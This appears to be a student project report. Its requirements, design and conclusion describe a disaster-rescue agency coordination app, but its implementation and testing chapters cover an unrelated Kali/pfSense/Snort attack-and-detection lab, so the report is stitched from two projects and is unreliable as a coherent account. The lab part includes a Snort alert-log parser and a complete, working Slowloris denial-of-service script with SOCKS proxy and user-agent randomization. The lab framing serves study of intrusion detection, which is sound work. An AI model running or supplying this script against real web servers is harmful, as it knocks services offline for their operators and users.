 An in-app messaging system must be available to enable direct communication between agencies, facilitating easy and quick coordination.
 Alerts, notifications, and request features should be built in to request assistance, report the
status, or offer collaboration between agencies. This will help agencies stay informed about
evolving situations and available support.

Resource Sharing:

 The platform should allow agencies to list and share critical resources such as medical
supplies, rescue equipment, transportation, and communication infrastructure.
 Resource allocation features should be designed to ensure effective distribution, using real-
time data to match the available resources to the areas most in need, reducing redundancy and
optimizing the overall relief effort.


4.2 NON-FUNCTIONAL REQUIREMENTS

 Security:
• Ensure data privacy by implementing strong encryption techniques for storing and transmitting sensitive information, such as agency details and resource allocation data.
• Implement multi-factor authentication (MFA) and role-based access control (RBAC) to secure the application and restrict access to authorized personnel only.
 Scalability:
• Design the system with a scalable architecture to accommodate the growing number of rescue agencies, volunteers, and resources as the user base increases.
• The system should be able to handle spikes in data traffic during large-scale disasters without performance degradation.
 Reliability:
• The application must be reliable and maintain high availability during critical times, especially during disaster situations when immediate coordination is necessary.
• Ensure that the platform provides uptime guarantees through redundancy and fault-tolerant systems, such as load balancing and backup systems.
 Usability:
• Provide an intuitive and user-friendly interface, ensuring that rescue agencies and personnel can easily navigate and operate the application, even under high-stress conditions during disasters.
• Include accessibility features like high-contrast modes, text-to-speech options, and easy-to-read fonts to cater to a diverse set of users, including those with disabilities or in chaotic environments.
 Performance:
• Optimize for fast response times to support real-time decision-making, such as quick updates on the availability of resources and the location of rescue teams.
• Ensure efficient data handling with minimal latency, enabling timely updates on mapping and resource allocation without delays or system slowdowns, even during peak disaster periods.

4.3 SOFTWARE REQUIREMENTS

 Operating System: Microsoft Windows 11/10/8.1 (64-bit), macOS, or Linux
 Development Environment:
• Android Studio 2023.2.1 or higher
• Java Development Kit (JDK) 11 or higher
• Android SDK Platform-Tools and Build-Tools
 Emulator: Android Emulator to test and simulate the application for various Android
devices
 Database: A cloud-based or local database solution (e.g., Firebase, SQLite) for storing
user data, resources, and communication logs
 Version Control: Git or GitHub for version control and project collaboration.


4.4 HARDWARE REQUIREMENTS

 CPU: x86_64 CPU architecture
• Intel i5 or newer, or AMD CPU with support for AMD Virtualization (AMD-V) and SSSE3
 RAM: 8 GB or more for efficient multitasking and running resource-intensive applications (e.g., Android Studio, Emulator)
 Disk Space: 256 GB or more of available disk space to accommodate the IDE, Android SDK, Android Emulator, and project files.
 GPS: A GPS receiver integrated into the device to track real-time locations of rescue agencies and assets.
 Network Connectivity: Internet access to allow communication with the central database, share real-time data between agencies, and receive system updates or notifications.


CHAPTER 5

SYSTEM DESIGN

5.1 SYSTEM ARCHITECTURE

Figure 5.1: System Architecture

1. Requirement Analysis:

Begin by engaging with stakeholders, including rescue agency representatives, to understand the
specific needs of the system. Gather essential information such as the types of data to be
stored (e.g., agency details, resources), user roles (e.g., rescue coordinators, agency
personnel), and the necessary communication functionalities (e.g., real-time messaging,
alerts). This process should involve detailed discussions to ensure all operational
requirements are captured.

2. Database Design:

Design a centralized database to store critical agency information, such as contact details,
location, resources, and areas of expertise. Use a relational database management system
(RDBMS) to ensure data integrity, consistency, and scalability. Develop appropriate database
schemas to handle large amounts of data efficiently while allowing easy access and retrieval
of information. Incorporate normalization techniques to eliminate redundancy and ensure that
the data is well-structured.


3. Data Entry Methods:

Develop both manual and automated data entry methods. Manual forms will be used by
administrators to input agency details and resources, while automated mechanisms will
collect and update data using GPS and other location-tracking technologies. These features
should include data validation checks to ensure that the entered information is accurate and
consistent, preventing errors or invalid data from entering the system.

4. User Interface and Experience Design:

Design an intuitive, easy-to-navigate interface that helps users quickly access the information
they need. Incorporate a map that displays the real-time locations of registered agencies,
allowing users to track resources and personnel. Implement search and filter options,
enabling users to refine their searches based on various criteria, such as disaster type,
available resources, and last activity status. Ensure that the design is accessible to users in
high-stress situations, with clear visual cues and quick navigation options.

5. Real-time Location Integration:

Integrate GPS and location-tracking technologies into the application to automatically record and
update the location of agencies in real-time. Use location-based APIs, such as Google Maps
or Mapbox, to plot the locations of rescue agencies on a map, giving a comprehensive
overview of the disaster response efforts. Ensure that the location data is accurate and
refreshed periodically to provide real-time situational awareness.

6. Communication and Collaboration Tools:

Build communication features that enable real-time messaging between agencies, allowing them
to send alerts, request assistance, and collaborate on disaster response. Implement secure
messaging systems for confidentiality and data integrity, and develop a resource-sharing
platform where agencies can offer and request critical supplies and equipment.

7. Security and Data Privacy Measures:

Implement robust security protocols to protect sensitive data, including authentication and
encryption mechanisms. Ensure that only authorized personnel can access certain
information. Secure both data transmission and storage to mitigate potential threats and
ensure compliance with data protection regulations.


8. Scalability and System Optimization:

Design the system for scalability, ensuring it can handle increasing numbers of users and
agencies as the response effort grows. Use performance optimization techniques like load
balancing, caching, and efficient database queries to maintain a responsive and reliable
system during high-demand periods.

9. Quality Assurance and Testing:

Conduct extensive testing to identify and resolve bugs, usability challenges, and security
vulnerabilities. Perform unit and integration testing to ensure individual components and the
entire system function properly. Involve end-users in testing to ensure the application meets
the needs of rescue agencies. Test performance under simulated disaster scenarios to ensure
system stability during peak usage.

5.2 NETWORK TOPOLOGY

Figure 5.2: Network Topology


Basic Network Topology

For this setup, a peer-to-peer or client-server network topology might be used, depending on your configuration.
1. Peer-to-Peer Topology:
o In a peer-to-peer setup, both Kali Linux and Mint Linux can act as both servers and clients. Each
device can communicate directly with the other without relying on a central server.
o This type of topology is simpler and more flexible, typically used in smaller networks or for tasks
like attack and defense simulations, where both machines have equal roles in communication.
2. Client-Server Topology:
o In a client-server setup, one device (e.g., Kali Linux) could act as the server, providing resources
or services (e.g., performing attack simulations), while the other device (e.g., Mint Linux) acts as
the client, requesting or utilizing those services.
o This topology is more structured and common in larger network configurations, where roles are
divided for specific tasks such as penetration testing (Kali as attacker) and network monitoring
(Mint as defender).

How Kali Linux and Mint Linux can communicate:

 Local Network (LAN): If both devices are connected to the same local network (via Ethernet or Wi-Fi),
they can communicate through their IP addresses. Kali Linux can perform penetration tests on Mint
Linux, while Mint Linux can monitor network traffic.
 Virtual Network: If you are using virtualization software like VirtualBox or VMware, both Kali and Mint
Linux can be set up in a virtual network, which simulates a real network. They can communicate as if
they were physical devices on the same network, even if they are running as virtual machines on the same
host.
Example Use Case:
 Kali Linux could be used to simulate attacks such as network sniffing, DDoS (Distributed Denial of
Service), or brute-force attacks.
 Mint Linux could be used as a target device or to run a Firewall or IDS/IPS (Intrusion
Detection/Prevention System) to defend against these attacks.


CHAPTER 6

IMPLEMENTATION

6.1 Software Implementation

 Programming Language: Python
 Platform: Virtual Environment (using pfSense and Snort for firewall and IDS simulation)
 Modules Implemented:

• Firewall Configuration
• Intrusion Detection System (IDS) Setup
• Attack Simulation
• Real-time Traffic Monitoring
• Alerts and Logs Generation
• Data Analysis and visualization

6.2 Modular Description

FIREWALL CONFIGURATION:
 Configures pfSense to monitor and filter incoming and outgoing network traffic based on
predefined security rules.
 Enables features like IP blocking, port filtering, and VPN configurations to secure the network.
 Uses predefined rulesets for common threats and custom rules for specific vulnerabilities.

INTRUSION DETECTION SYSTEM (IDS) SETUP:

 Deploys Snort to detect and prevent network intrusions by analyzing packet data and
comparing it to known threat signatures.

 Configures rules to alert on potential attacks, such as SQL injection, buffer overflow, or port
scanning.

 Provides real-time detection and logging of suspicious activities to monitor network security.

ATTACK SIMULATION:
 Utilizes Kali Linux to simulate various types of attacks (e.g., DDoS, port scanning, spoofing) to
test the network security.
 Monitors the response of pfSense and Snort during attacks to evaluate their effectiveness.
 Generates logs and alerts in real time during attack scenarios for analysis.


REAL-TIME TRAFFIC MONITORING:

 Uses Snort and pfSense’s monitoring features to provide live traffic analysis, allowing the user
to see the current state of the network.
 Displays inbound and outbound network traffic, highlighting any unusual patterns or potential
threats.
 Generates a report with detailed traffic data for further analysis.

ALERTS AND LOGS GENERATION:

 Configures alerts in pfSense and Snort to notify administrators of suspicious activities.
 Logs important events such as firewall rule violations, detected intrusions, and attack
simulations.
 Provides logs in both a textual format and as visual alerts for easy interpretation by
administrators.

DATA ANALYSIS AND VISUALIZATION:

 Collects data from Snort logs, pfSense traffic reports, and attack simulations.
 Uses Python’s data analysis libraries (e.g., pandas, matplotlib) to generate insights and visual
representations of network activity and security status.
 Provides detailed graphs, tables, and charts to monitor the network's health and the effectiveness
of security measures.
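As an added example of the log collection this module describes (not NetSpartan's own code): a parser for Snort's alert_fast output that aggregates alerts per source host and flags scan-like and DoS-classified activity before the data is handed to pandas or matplotlib. The alert lines, rule messages, SIDs and addresses below are constructed samples, not captures from the project's lab.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Constructed sample lines in Snort's alert_fast format (SIDs/messages are assumed).
SAMPLE_ALERTS = """\
03/15-14:22:01.100000  [**] [1:1000001:1] NMAP TCP SYN scan detected [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.2.10:54321 -> 192.168.2.4:22
03/15-14:22:01.110000  [**] [1:1000001:1] NMAP TCP SYN scan detected [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.2.10:54322 -> 192.168.2.4:80
03/15-14:22:01.120000  [**] [1:1000001:1] NMAP TCP SYN scan detected [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.2.10:54323 -> 192.168.2.4:443
03/15-14:25:40.500000  [**] [1:1000002:1] Slow HTTP DoS - many partial requests [**] [Classification: Attempted Denial of Service] [Priority: 2] {TCP} 192.168.2.10:40000 -> 192.168.2.4:80
03/15-14:25:41.500000  [**] [1:1000002:1] Slow HTTP DoS - many partial requests [**] [Classification: Attempted Denial of Service] [Priority: 2] {TCP} 192.168.2.10:40001 -> 192.168.2.4:80
this line is not an alert and must be skipped
03/15-14:30:00.000000  [**] [1:1000003:1] ICMP echo request [**] [Classification: Misc activity] [Priority: 3] {ICMP} 192.168.2.7 -> 192.168.2.4
"""

# alert_fast layout: timestamp [**] [gid:sid:rev] msg [**] [Classification: ...] [Priority: n] {proto} src[:port] -> dst[:port]
ALERT_RE = re.compile(
    r"""^(?P<ts>\d{2}/\d{2}-\d{2}:\d{2}:\d{2}\.\d+)\s+\[\*\*\]\s+
    \[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]\s+
    (?:\[Classification:\s*(?P<cls>[^\]]*)\]\s+)?\[Priority:\s*(?P<prio>\d+)\]\s+
    \{(?P<proto>[A-Za-z0-9]+)\}\s+(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+
    (?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$""",
    re.VERBOSE,
)


@dataclass
class Alert:
    timestamp: str
    gid: int
    sid: int
    rev: int
    msg: str
    classification: str
    priority: int
    proto: str
    src: str
    sport: Optional[int]  # None for port-less protocols such as ICMP
    dst: str
    dport: Optional[int]


def parse_alert_line(line: str) -> Optional[Alert]:
    """Return an Alert for one alert_fast line, or None if the line is malformed."""
    m = ALERT_RE.match(line.strip())
    if not m:
        return None
    return Alert(
        timestamp=m["ts"], gid=int(m["gid"]), sid=int(m["sid"]), rev=int(m["rev"]),
        msg=m["msg"].strip(), classification=(m["cls"] or "").strip(),
        priority=int(m["prio"]), proto=m["proto"].upper(), src=m["src"],
        sport=int(m["sport"]) if m["sport"] else None, dst=m["dst"],
        dport=int(m["dport"]) if m["dport"] else None,
    )


def parse_alerts(text: str) -> List[Alert]:
    """Parse a whole log; unparseable lines are skipped rather than aborting the run."""
    return [a for a in map(parse_alert_line, text.splitlines()) if a is not None]


@dataclass
class SourceSummary:
    alert_count: int = 0
    distinct_dports: Set[int] = field(default_factory=set)
    sids: Counter = field(default_factory=Counter)
    classifications: Set[str] = field(default_factory=set)
    highest_priority: int = 99  # Snort priority 1 is the most severe


def summarize_by_source(alerts: List[Alert]) -> Dict[str, SourceSummary]:
    """Roll alerts up per source address: counts, touched ports, SIDs, severity."""
    summary: Dict[str, SourceSummary] = defaultdict(SourceSummary)
    for a in alerts:
        s = summary[a.src]
        s.alert_count += 1
        if a.dport is not None:
            s.distinct_dports.add(a.dport)
        s.sids[a.sid] += 1
        if a.classification:
            s.classifications.add(a.classification)
        s.highest_priority = min(s.highest_priority, a.priority)
    return dict(summary)


def flag_suspicious(summary: Dict[str, SourceSummary], scan_port_threshold: int = 3) -> Dict[str, List[str]]:
    """Label sources that touched many distinct ports (scan-like) or raised DoS-classified alerts."""
    flags: Dict[str, List[str]] = {}
    for src, s in summary.items():
        labels = []
        if len(s.distinct_dports) >= scan_port_threshold:
            labels.append("port-scan")
        if any("denial of service" in c.lower() for c in s.classifications):
            labels.append("dos")
        if labels:
            flags[src] = labels
    return flags


def message_histogram(alerts: List[Alert]) -> Counter:
    """Alert message frequencies, the series a bar chart of the lab run would plot."""
    return Counter(a.msg for a in alerts)


if __name__ == "__main__":
    parsed = parse_alerts(SAMPLE_ALERTS)
    per_source = summarize_by_source(parsed)
    for src, s in per_source.items():
        print(f"{src}: {s.alert_count} alerts, ports={sorted(s.distinct_dports)}, "
              f"highest priority={s.highest_priority}")
    print(flag_suspicious(per_source))
```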

Figure 6.1: NetSpartan script initiation

6.3 Source Code for DoS Attack Initiation in Python

# Slowloris-style script used for the attack simulation against the lab target:
# it opens many partial HTTP requests and keeps them alive with periodic headers.
import argparse
import logging
import random
import socket
import sys
import time

parser = argparse.ArgumentParser(
    description="Slowloris, low bandwidth stress test tool for websites"
)
parser.add_argument("host", nargs="?", help="Host to perform stress test on")
parser.add_argument(
    "-p", "--port", default=80, help="Port of webserver, usually 80", type=int
)
parser.add_argument(
    "-s",
    "--sockets",
    default=150,
    help="Number of sockets to use in the test",
    type=int,
)
parser.add_argument(
    "-v",
    "--verbose",
    dest="verbose",
    action="store_true",
    help="Increases logging",
)
parser.add_argument(
    "-ua",
    "--randuseragents",
    dest="randuseragent",
    action="store_true",
    help="Randomizes user-agents with each request",
)
parser.add_argument(
    "-x",
    "--useproxy",
    dest="useproxy",
    action="store_true",
    help="Use a SOCKS5 proxy for connecting",
)
parser.add_argument(
    "--proxy-host", default="127.0.0.1", help="SOCKS5 proxy host"
)
parser.add_argument(
    "--proxy-port", default="8080", help="SOCKS5 proxy port", type=int
)
parser.add_argument(
    "--https",
    dest="https",
    action="store_true",
    help="Use HTTPS for the requests",
)
parser.add_argument(
    "--sleeptime",
    dest="sleeptime",
    default=15,
    type=int,
    help="Time to sleep between each header sent.",
)
parser.set_defaults(verbose=False)
parser.set_defaults(randuseragent=False)
parser.set_defaults(useproxy=False)
parser.set_defaults(https=False)
args = parser.parse_args()

if len(sys.argv) <= 1:
    parser.print_help()
    sys.exit(1)

if not args.host:
    print("Host required!")
    parser.print_help()
    sys.exit(1)

if args.useproxy:
    # Tries to import the external "socks" library
    # and monkey patches socket.socket to connect over
    # the proxy by default
    try:
        import socks

        socks.setdefaultproxy(
            socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port
        )
        socket.socket = socks.socksocket
        logging.info("Using SOCKS5 proxy for connecting...")
    except ImportError:
        logging.error("Socks Proxy Library Not Available!")
        sys.exit(1)

logging.basicConfig(
    format="[%(asctime)s] %(message)s",
    datefmt="%d-%m-%Y %H:%M:%S",
    level=logging.DEBUG if args.verbose else logging.INFO,
)


def send_line(self, line):
    # Every HTTP header line is terminated by CRLF
    line = f"{line}\r\n"
    self.send(line.encode("utf-8"))


def send_header(self, name, value):
    self.send_line(f"{name}: {value}")


if args.https:
    logging.info("Importing ssl module")
    import ssl

    setattr(ssl.SSLSocket, "send_line", send_line)
    setattr(ssl.SSLSocket, "send_header", send_header)

list_of_sockets = []
user_agents = [
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
]

setattr(socket.socket, "send_line", send_line)
setattr(socket.socket, "send_header", send_header)


def init_socket(ip: str):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(4)

    if args.https:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        s = ctx.wrap_socket(s, server_hostname=args.host)

    s.connect((ip, args.port))

    # Start a request but never finish its headers, so the server keeps waiting
    s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1")

    ua = user_agents[0]
    if args.randuseragent:
        ua = random.choice(user_agents)

    s.send_header("User-Agent", ua)
    s.send_header("Accept-language", "en-US,en,q=0.5")
    return s


def slowloris_iteration():
    logging.info("Sending keep-alive headers...")
    logging.info("Socket count: %s", len(list_of_sockets))

    # Try to send a header line to each socket
    for s in list(list_of_sockets):
        try:
            s.send_header("X-a", random.randint(1, 5000))
        except socket.error:
            list_of_sockets.remove(s)

    # Some of the sockets may have been closed due to errors or timeouts.
    # Re-create new sockets to replace them until we reach the desired number.
    diff = args.sockets - len(list_of_sockets)
    if diff <= 0:
        return

    logging.info("Creating %s new sockets...", diff)
    for _ in range(diff):
        try:
            s = init_socket(args.host)
            if not s:
                break
            list_of_sockets.append(s)
        except socket.error as e:
            logging.debug(e)
            break


def main():
    ip = args.host
    socket_count = args.sockets
    logging.info("Attacking %s with %s sockets.", ip, socket_count)

    logging.info("Creating sockets...")
    for _ in range(socket_count):
        try:
            logging.debug("Creating socket nr %s", _)
            s = init_socket(ip)
        except socket.error as e:
            logging.debug(e)
            break
        list_of_sockets.append(s)

    while True:
        try:
            slowloris_iteration()
        except (KeyboardInterrupt, SystemExit):
            logging.info("Stopping Slowloris")
            break
        except Exception as e:
            logging.debug("Error in Slowloris iteration: %s", e)
        logging.debug("Sleeping for %d seconds", args.sleeptime)
        time.sleep(args.sleeptime)


if __name__ == "__main__":
    main()


Figure 6.2: Source rules for Snort (IDS)

Figure 6.3: Example of defined rules in Snort



CHAPTER 7

TESTING

7.1 METHODS OF TESTING

➢ Testing is an essential process in software development, with the goal of ensuring the system works as expected and is free from errors. Here are several testing types commonly applied in the development of an effective project:

SOURCE CODE TESTING

Objective: Examines the logic of the system.

Purpose: Ensures that the output generated is as expected by the user. If the output matches
the requirement, the logic is considered correct.

SPECIFICATION TESTING

Objective: Compares system performance with specified requirements.

Purpose: Evaluates the system’s behavior under various conditions, ensuring that it adheres
to the expected functionality and performance.

MODULE LEVEL TESTING

Objective: Tests individual modules of the system.

Purpose: Identifies errors within specific modules, allowing programmers to fix them
without affecting other parts of the system.

UNIT TESTING

Objective: Focuses on testing the smallest unit or module of the software.

Purpose: Verifies the integrity of local data structures and ensures correct functionality at
boundary conditions. It tests the behavior of each unit in isolation, ensuring correctness
during execution.


PERFORMANCE TESTING
Objective: Assesses the system's performance under different conditions.

Purpose: Tests the software’s runtime performance and efficiency. It often includes stress
testing to ensure the system can handle peak loads and continues to operate smoothly under
extreme conditions.

SECURITY TESTING
Objective: Verifies the system’s security features.

Purpose: Ensures that the system is protected from unauthorized access or attacks. It involves
testing defenses like password protection, error handling, and resistance to penetration attempts.

OUTPUT TESTING
Objective: Verifies the system produces the correct output.

Purpose: Ensures that the system generates the required output in the correct format, whether
on screen or through a printer. It checks for accuracy, formatting, and compliance with user
specifications.

USER ACCEPTANCE TESTING

Objective: Confirms that the system meets user expectations.

Purpose: Involves testing the system with real users to ensure it meets their needs. Changes
and adjustments are made based on user feedback during development. It ensures that the
system is ready for deployment and accepted by the end-users.

7.2 UNIT TESTING

Unit Testing is one of the fundamental types of testing in software development. It focuses on
validating the smallest unit or component of the software, typically a function or method, to
ensure that it performs its intended task correctly. Unit tests are usually written by developers
during the development process to validate their code as they work. This makes unit testing a
proactive approach to identifying and fixing errors early in the development lifecycle.

OBJECTIVES OF UNIT TESTING

 Verify correctness: The primary goal of unit testing is to ensure that individual units of
the software behave as expected, based on predefined inputs and expected outputs.

 Isolate components: Unit tests focus on testing a single unit in isolation from the rest of
the system, ensuring that dependencies do not affect the test results.


 Identify bugs early: By testing each component as it's developed, bugs and issues can be
caught early, reducing the cost of fixing defects later in the development process.

 Simplify debugging: Since unit tests are focused on small code segments, they make it
easier to pinpoint where a bug occurs, facilitating quicker debugging.

KEY FEATURES OF UNIT TESTING

1. Isolation: Unit tests are designed to isolate the unit being tested from the rest of the
system. External dependencies like databases, file systems, or networks are mocked or
stubbed.

2. Automation: Unit tests are automated, allowing them to be run frequently during
development to check if changes to the code break existing functionality.

3. Fast Feedback: Unit tests provide quick feedback, allowing developers to check if their
code works as expected after each change.

4. Reusability: Once written, unit tests can be reused across different stages of
development and even in future projects to test similar components.

5. Small Scope: Unit testing focuses on testing small, isolated parts of the system (often
individual functions or methods), rather than the entire application.

BENEFITS OF UNIT TESTING

 Improved Code Quality: By verifying that individual components work as expected, unit testing helps improve the overall quality and robustness of the codebase.

 Easier Refactoring: With a solid suite of unit tests, developers can safely refactor code,
knowing that any unintended changes to functionality will be caught by the tests.

 Documentation: Unit tests can serve as a form of documentation, demonstrating how specific functions or methods are intended to behave.

 Reduction in Costs: Catching errors early with unit tests can significantly reduce the
cost of fixing bugs that would otherwise go unnoticed until later stages of development.

 Faster Debugging: Since unit tests are designed to check small code segments, they can
help identify the exact location of a bug quickly, simplifying the debugging process.

BEST PRACTICES FOR UNIT TESTING

 Keep tests independent: Each test should be independent of others, ensuring that tests
do not rely on each other’s results.

 Test one thing at a time: A unit test should verify one specific behavior or logic to avoid
confusion and make debugging easier.

 Use descriptive names: Unit test names should clearly indicate the purpose of the test,
making it easy to understand what is being verified.


 Test edge cases: Include tests for boundary conditions and edge cases, such as null
inputs, empty strings, or invalid data, to ensure the system behaves correctly under all
scenarios.

 Mock external dependencies: Use mocks or stubs to simulate external dependencies such as databases or external services, ensuring that the unit test focuses solely on the component being tested.

Performing a port scan with Nmap on the target machine 192.168.2.4

Figure 7.1: Nmap scan results

Alerts on the IDS console for the Nmap port scan

Figure 7.2: Console alert response

Performing a DoS attack on the target machine 192.168.2.4

Figure 7.3: DoS attack initiation


DoS attack alerts on the IDS console from the attacking machine.

Figure 7.4: IDS alerts for DoS


CHAPTER 8

CONCLUSION AND FUTURE WORKS


In conclusion, the development of an application serving as a centralized database for rescue
agencies is a transformative step toward improving disaster response and coordination. By
enabling the registration of agencies along with their information, including location, contact
details, and areas of expertise, this application holds the potential to greatly enhance the efficiency
and effectiveness of rescue operations.
Incorporating features like map visualization, filtering options, and integrated communication tools
allows agencies to collaborate seamlessly, share resources, and respond to emergencies with
greater speed and precision. The application’s success, however, relies on implementing robust
security and privacy measures to safeguard sensitive data and restrict access to authorized
personnel only.
As the world faces an increasing frequency of natural and man-made disasters, such a tool
becomes invaluable in saving lives and mitigating the impact of crises. Its development
underscores the critical role of technology in advancing disaster management and relief efforts,
ultimately contributing to a more resilient and prepared society.

8.1 FUTURE WORKS

Advanced Communication & Collaboration Tools
Develop features like real-time video and audio communication, collaborative mapping tools with
shared annotations, and integration with drone footage. These enhancements will provide improved
situational awareness and enable seamless remote coordination during disaster response.

Citizen Integration
Introduce functionality for trained citizens to register and contribute their expertise, such as first aid
or language translation, to disaster relief efforts. This will require robust verification processes and
training modules to ensure reliability and safety, thereby expanding the rescue network's capacity.

Predictive Analytics
Incorporate AI-driven predictive analytics to analyze historical disaster data and real-time
environmental factors. This feature can help identify potential disaster zones, enabling rescue
agencies to pre-position resources and enhance preparedness for emergencies.

Offline Functionality
Develop offline capabilities to ensure the application remains operational in areas with limited or no
internet connectivity. Features such as pre-downloaded maps, cached information on rescue
agencies, and offline communication protocols will be crucial for maintaining functionality in critical
situations.

These future enhancements aim to make the application more resilient, inclusive, and effective in
addressing diverse challenges during disaster management, further solidifying its role as a vital tool
for rescue operations.
APPENDIX A:

List of Acronyms and Abbreviations

 IDS: Intrusion Detection System
 IPS: Intrusion Prevention System
 IoT: Internet of Things
 VPN: Virtual Private Network
 IP: Internet Protocol
 DNS: Domain Name System
 SSL: Secure Sockets Layer
 GUI: Graphical User Interface

Glossary of Terms
 Firewall: A network security system that monitors and controls incoming and outgoing traffic
based on predetermined security rules.
 Intrusion Detection System (IDS): A system that monitors network traffic for suspicious
activity and alerts the user when potential threats are detected.
 Packet Filtering: A method to control network access by monitoring outgoing and incoming
packets and allowing or blocking them based on source and destination IP addresses,
protocols, or ports.
 Virtual Lab: A simulated environment that mimics real-world network configurations for
testing and training.
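As an added illustration of the Packet Filtering and Firewall entries above (example code, not part of the NetSpartan project), the following Python sketch evaluates a stateless, pfSense-style ordered ruleset: first matching rule wins, and a packet that matches no rule is blocked by default. The addresses, rules and packets are constructed for the example.

```python
import ipaddress
from dataclasses import dataclass

@dataclass
class Rule:
    action: str                   # "pass" or "block"
    proto: str                    # "tcp", "udp" or "any"
    src: ipaddress.IPv4Network    # permitted source address range
    dst: ipaddress.IPv4Network    # permitted destination address range
    dports: range                 # destination ports; range(0, 65536) means any

@dataclass
class Packet:
    proto: str
    src: str
    dst: str
    dport: int

def rule_matches(rule: Rule, pkt: Packet) -> bool:
    """A rule matches only when every one of its criteria matches the packet."""
    return ((rule.proto == "any" or rule.proto == pkt.proto)
            and ipaddress.ip_address(pkt.src) in rule.src
            and ipaddress.ip_address(pkt.dst) in rule.dst
            and pkt.dport in rule.dports)

def evaluate(rules, pkt: Packet):
    """First matching rule wins, so rule order matters. A packet matching no
    rule falls through to an implicit block (default deny). The index of the
    matched rule is returned with the verdict so the decision can be logged."""
    for idx, rule in enumerate(rules):
        if rule_matches(rule, pkt):
            return rule.action, idx
    return "block", None

# Constructed ruleset with hypothetical addresses (not taken from the report).
ANY = ipaddress.ip_network("0.0.0.0/0")
LAN = ipaddress.ip_network("192.168.10.0/24")
WEB = ipaddress.ip_network("192.168.10.20/32")
RULES = [
    Rule("block", "tcp", ANY, WEB, range(22, 23)),     # nobody may SSH to the web server
    Rule("pass", "tcp", ANY, WEB, range(443, 444)),    # HTTPS to the web server is allowed
    Rule("pass", "any", LAN, ANY, range(0, 65536)),    # LAN hosts may initiate anything
]

if __name__ == "__main__":
    # Constructed packets: allowed HTTPS, blocked SSH, probe of an unused port, LAN host to SSH
    for pkt in [Packet("tcp", "203.0.113.5", "192.168.10.20", 443), Packet("tcp", "203.0.113.5", "192.168.10.20", 22),
                Packet("tcp", "203.0.113.5", "192.168.10.20", 8080), Packet("tcp", "192.168.10.7", "192.168.10.20", 22)]:
        print(pkt, "->", evaluate(RULES, pkt))
```

Note that the LAN host's SSH attempt is still blocked: the block rule sits above the LAN pass rule, which is why ordering is part of the policy.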

Software and Tools Used

